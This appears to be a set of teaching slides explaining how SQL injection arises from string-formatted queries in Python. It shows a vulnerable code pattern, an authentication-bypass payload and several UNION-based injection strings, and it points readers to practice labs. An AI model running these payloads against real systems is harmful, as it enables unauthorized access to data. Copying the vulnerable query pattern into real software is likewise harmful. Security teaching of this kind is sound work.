Topics

• How an SQL Injection is Created
• How to Exploit an SQL Injection
• SPOILER: How to Prevent an SQL Injection in the Next Presentation

How Does it Happen

An SQL injection occurs when two things come together.

Number 1

An SQL Query as a string embedded in other languages.

sql_query =
  cursor.execute(
    "SELECT * FROM users WHERE username = 'admin' \
    AND password = 's3cur3P4ssw0rd'"
  )

Number 2

User input is possible as a part of said SQL query. Input is delimited, e.g. by ' characters.

sql_query =
  cursor.execute(
    "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \
    % (username, password)
  )

How to Exploit an SQLi Vulnerability

• Close the string through an ending quote
• Continue the query with your own SQL code

Crafting an SQL Query

' or '1'='1' -- -

• Close the existing string with: '
• Concatenate a second query: or
• Write a query that equals to True: 1=1
• End the SQL query through a comment: -- -

What Does the Query Look Like

SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s'

You can see thath the value of username has been closed by the ' character.
Numbers as strings is an SQLite specific thing

Other Queries

' UNION SELECT 'a',NULL,NULL,NULL -- -

' UNION SELECT * FROM users WHERE user_id = 1 -- -

' UNION SELECT * FROM users WHERE user_id != 1337 -- -

Even More Injection Queries

• PayloadsAllTheThings
• Hacktricks SQL Injection Page
• SQLMap

Try for Yourself

• Use the provided example inside this presentation’s repository. There is a readme which guides you through the setup.

• Further, try Damn Vulnerable Web Application which you can setup by yourself or use Tryhackme’s DVWA Room.

The End